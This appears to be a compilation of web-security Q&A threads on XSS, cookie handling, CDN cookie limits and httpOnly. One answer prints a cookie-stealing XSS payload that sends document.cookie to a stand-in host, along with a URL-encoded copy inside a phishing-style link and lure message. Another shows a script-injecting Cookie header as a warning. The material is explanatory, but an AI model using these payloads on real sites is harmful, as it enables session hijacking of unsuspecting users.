is there a way to exploit the victims through Self-contained XSS, XSS vulnerabilities which are protected by CSRF protections based on login credential ??
Thanks
Assuming that self-contained XSS is a data: URI containing HTML with JS, then no.
data: URIs are considered to have unique origin, which is different from all other origins.
Related
we are using aws cloudfront to distribute our angular webapps to the web. We have this setup and configured so our webapps are live and can be accessed. However, due to the need to allow for authentication across these apps we have implemented cookies where the domain is set to the core domain with wildcard for subdomains. For example we may have two webapps one at appone.example.com and the other at apptwo.example.com. Both of which are looking at the same selection of cookies shared across subdomains by setting the cookie domain to .example.com.
Now this setup works great, we do not send our cookies with api requests and instead just send an authentication header so no issues with header size there and we do not have a need for these cookies to make there way into the request to cloudfront. However, these requests are instigated by the browser so the request can not be manipulated to remove the cookie header which is where the issues arise.
When we have quite a few cookies (around 30) two lots of cognito cookies and a few others containing information to instigate the cognito setup to utilise the cognito cookies. It means the request size falls around 22,000 bytes. This exceeds the limit aws of 20,480 bytes which is stated here. If my request is below 20,480 bytes it completes successfully.
Now considering I do not need these cookies to hit the cloudfront request I assumed you would be able to strip them from the header in part of the origin request policies or using Viewer request Lambda#Edge function. However, it does not seem to be getting far enough to hit this functionality.
Here is some example code provided by aws template. This Lambda#Edge function does not strip the headers as suggested above however should still log the event if being hit, if the request is less that 20,480 bytes it does. If not it does not log...:
exports.handler = async (event, context) => {
console.log(event);
/*
* Generate HTTP response using 200 status code with a simple body.
*/
const response = {
status: '200',
statusDescription: 'OK',
headers: {
vary: [{
key: 'Vary',
value: '*',
}],
'last-modified': [{
key: 'Last-Modified',
value: '2017-01-13',
}],
},
body: 'Example body generated by Lambda#Edge function.',
};
return response;
};
Now, I think I could mitigate the issue by removing one set of the cognito cookies and the configuration cookies involved in instantiating that, however this is a less than ideal situation because it means that each time you chop and change between the two systems you will need to re-login which is not great and does not fit our use case which is quite specialised.
The other solution is to remove the use of cookies and switch to local storage shared across domains. This however, then brings a security challenge with XSS and from initial research seems unviable and unacceptable.
So overall based on my current limited understanding on aws cloudfront my question becomes can the cookie header be stripped from the request and hence allow the request to be accepted without 494 error page. In our use case we only wish to use cookies as a means of cross domain storage so do not need thee cookies to venture up to the static js files request.
494 error image link
If you just want to avoid sending cookies with requests to static assets set up a different domain and serve them from there.
But I'm a really wondering what you're thinking here; If your angular app can access the token stored as a cookie then it isn't any safer than localstorage from an XSS standpoint.
I want to post a banner ad on a.com, for this to happen, a.com has to query b.com for the banner url via jsonp. When requested, b.com returns something like this:
{
img_url: www.c.com/banner.jpg
}
My question is: is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
To clarify:
c.com isn't trying to track any information on a.com. It just wants to set a third-party cookie on the client browser for tracking purpose.
I have no control of a.com, so I cannot write any client side JS or ask them to include any external js files. I can only expose a query url on b.com for a.com's programmer to query
I have total control of b.com and c.com
When a.com receives the banner url via JSONP, it will insert the banner dynamically into its DOM for displaying purpose
A small follow up question:
Since I don't know how a.com's programmer will insert the banner into the DOM, is it possible for them to request the image from c.com but still prevents c.com to set any third-party cookies?
is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
Not based on the requests so far. c.com isn't involved beyond being mentioned by b.com.
If the data in the response from b.com was used to make a request to www.c.com then www.c.com could include cookie setting headers in its request.
Subsequent requests to www.c.com from the same browser would echo those cookies back.
These would be third party cookies, so are more likely to be blocked by privacy settings.
Simple Version
In the HTTP response from c.com, you can send a Set-Cookie header.
If the browser does end up loading www.c.com/banner1234.jpg and later www.c.com/banner7975.jpg, you can send e.g. Set-Cookie: seen_banners=1234,7975 to keep track of which banners have been seen.
When the HTTP request arrives at www.c.com, it will contain a header like Cookie: seen_banners=1234,7975 and you can parse out which banners have been seen.
If you use separate cookies like this:
Set-Cookie: seen_1234=true
Set-Cookie: seen_7975=true
Then you'll get back request headers like:
Cookie: seen_1234=true; seen_7975=true
The choice is up to you in terms of how much parsing you want to do of the values. Also note that there are many cookie attributes you may consider setting.
Caveats
Some modern browsers and ad-blocking extensions will block these
cookies as an anti-tracking measure. They can't know your intentions.
These cookies will be visible to www.c.com only.
Cookies have size restrictions imposed by browsers and even some
firewalls. These can be restrictions in per-cookie length, length
of sum of cookies per domain, or just number of cookies. I've
encountered a firewall that allowed a certain number of bytes in
Cookie: request headers and dropped all Cookie: headers beyond
that size. Some older mobile devices have very small limits on cookie
size.
Cookies are editable by the user and can be tampered with by
men-in-the-middle.
Consider adding an authenticator over your cookie value such as an HMAC, so that you can be sure the values you read are values you wrote. This won't defend against
replay attacks unless you
include a replay defense such as a timestamp before signing the cookie.
This is really important: Cookies you receive at your server in HTTP requests must be considered adversary-controlled data. Unless you've put in protections like that HMAC (and you keep your HMAC secret really secret!) don't put those values in trusted storage without labeling them tainted. If you make a dashboard for tracking banner impressions and you take the text of the cookie values from requests and display them in a browser, you might be in trouble if someone sends:
Cookie: seen_banners=<script src="http://evil.domain.com/attack_banner_author.js"></script>
Aside: I've answered your question, but I feel obligated to warn you that jsonp is really, really dangerous to the users of site www.a.com. Please consider alternatives, such as just serving back HTML with an img tag.
What is a clear explanation of the difference between server XSS and client XSS?
I read the explanation on the site of OWASP, but it wasn't very clear for me. I know the reflected, stored en DOM types.
First, to set the scene for anyone else finding the question we have the text from the OWASP Types of Cross-Site Scripting page:
Server XSS
Server XSS occurs when untrusted user supplied data is included in an HTML response generated by the server. The source of
this data could be from the request, or from a stored location. As
such, you can have both Reflected Server XSS and Stored Server XSS.
In this case, the entire vulnerability is in server-side code, and the
browser is simply rendering the response and executing any valid
script embedded in it.
Client XSS
Client XSS occurs when untrusted user supplied data is used to update
the DOM with an unsafe JavaScript call. A JavaScript call is
considered unsafe if it can be used to introduce valid JavaScript into
the DOM. This source of this data could be from the DOM, or it could
have been sent by the server (via an AJAX call, or a page load). The
ultimate source of the data could have been from a request, or from a
stored location on the client or the server. As such, you can have
both Reflected Client XSS and Stored Client XSS.
This redefines XSS into two categories: Server and Client.
Server XSS means that the data comes directly from the server onto the page. For example, the data containing the unsanitized text is from the HTTP response that made up the vulnerable page.
Client XSS means that the data comes from JavaScript which has manipulated the page. So it is JavaScript that has added the unsanitized text to the page, rather than it being in the page at that location when it was first loaded in the browser.
Example of Server XSS
An ASP (or ASP.NET) page outputs a variable to the HTML page when generated, which is taken directly from the database:
<%=firstName %>
As firstName is not HTML encoded, a malicious user may have entered their first name as <script>alert('foo')</script>, causing a successful XSS attack.
Another example is the output of variables processed through the server without prior storage:
<%=Request.Form["FirstName"] %>
Example of Client XSS*
<script type="text/javascript">
function loadXMLDoc() {
var xmlhttp;
if (window.XMLHttpRequest) {
// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp = new XMLHttpRequest();
} else {
// code for IE6, IE5
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4 ) {
if(xmlhttp.status == 200){
document.getElementById("myDiv").innerHTML = xmlhttp.responseText;
}
else if(xmlhttp.status == 400) {
alert('There was an error 400')
}
else {
alert('something else other than 200 was returned')
}
}
}
xmlhttp.open("GET", "get_first_name.aspx", true);
xmlhttp.send();
}
</script>
Note that our get_first_name.aspx method does no encoding of the returned data, as it is a web service method that is also used by other systems (content-type is set to text/plain). Our JavaScript code sets innerHTML to this value so it is vulnerable to Client XSS. To avoid Client XSS in this instance, innerText should be used instead of innerHTML which will not result in interpretation of HTML characters. It is even better to use textContent as Firefox is not compatible with the non-standard innerText property.
* code adapted from this answer.
SilverlightFox has explained everything well, but I would like to add some examples.
Server XSS:
So lets say, that we found a vulnerable website, which doesn't properly handle the comment box text. We create a new comment and type in:
<p>This picture gives me chills</p>
<script>img=new Image();img.src="http://www.evilsite.com/cookie_steal.php?cookie="+document.cookie+"&url="+document.domain;</script>
We also create a PHP script that will save both GET values into a text file, and we can then proceed to steal user's cookies. The cookies get send EACH TIME someone loads the injected comment, and doesn't even need to see it coming (only sees "This picture gives me chills" comment).
Client XSS:
Let's say we found a website, that has vulnerable search bar, and parses HTML we search for into the page. To test that, simply search for something like:
<font color="red">Test</font>
If the search results shows the word "Test" in red color, the search engine is vulnerable for client XSS. Attacker then uses personal messages/emails of users of the website, to send the users innocent looking url. This could look like:
Hello, I recently had a problem with this website's search engine.
Please click on following link:
http://www.vulnerable-site.com/search.php?q=%3C%73%63%72%69%70%74%3E%69%6D%67%3D%6E%65%77%20%49%6D%61%67%65%28%29%3B%69%6D%67%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%73%69%74%65%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%5F%73%74%65%61%6C%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2B%22%26%75%72%6C%3D%22%2B%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%3B%3C%2F%73%63%72%69%70%74%3E
When anyone clicks the link, the code is launched from their browsers (its encoded into URL chars, because else users may suspect the script in the website url), doing the same thing as script above -> stealing the cookies of the user.
However, if you use this without owner of the website's approval, you're breaking the law.
Keep that in mind, and use my examples to fix XSS holes on your website.
Has anyone had a problem in running domain level cookies with Akamai implementation?
The site issues a domain level cookie which contains 2 values which are used by other apps.
With Akamai in the mix, the cookie never gets generated. When I take Akamai out of the mix, everything works fine. Not sure if anyone else has seen this behavior. I am not clear on how Akamai handles cookies.
Akamai, by default, strips cookies from cached resources.
The logic (quit sensibly) is that cookies are designed to be specific to each browser/user, so caching them makes no sense.
My advice:
1. Check if the resource in question is being cached. You can use the Akamai browser plugins for this
2. Think carefully why you would want cookies in a cached resource
3. If you are sure you do want these cookies, contact Akamai. They can change this behaviour for you
As an alternative, you can still cache those pages: you'd need to define the cookies in an uncached URL, which should be called inside the cached pages, for example, as a tag.
That way you can do redirects, AJAX calls, or DOM manipulation from JS depending on cookies from within cached pages.
Searching for possible ways to get cookie with httpOnly enabled, I cannot find any. But then again, how do browser addons like Firebug, Add 'N Edit Cookie, etc. can get the cookies? Can't an attacker do the same?
So my question is, is it really, really impossible to get cookie of httpOnly enabled requests, using javascript?
p/s: Yes I'm aware httpOnly doesn't stop XSS attacks. I'm also aware it's futile against sniffers. Let's just focus on javascript, sort of alert(document.cookie) type / pre httpOnly era.
how do browser addons like Firebug,
Add 'N Edit Cookie, etc. can get the
cookies?
They are browser extensions, and the browser has access to the cookies ; extensions have a higher level of privileges than you JS code.
is it really, really impossible to get
cookie of httpOnly enabled requests,
using javascript?
Provided you are using a browser (ie, a quite recent browser) that support httpOnly and doesn't have a security bug about it, it should be impossible -- that's the goal of httpOnly.
Quoting wikipedia :
When the browser receives such a
cookie, it is supposed to use it as
usual in the following HTTP exchanges,
but not to make it visible to
client-side scripts.
Firebug and other addons can do that because they are not running under security restrictions imposed to the JavaScripts of the web pages.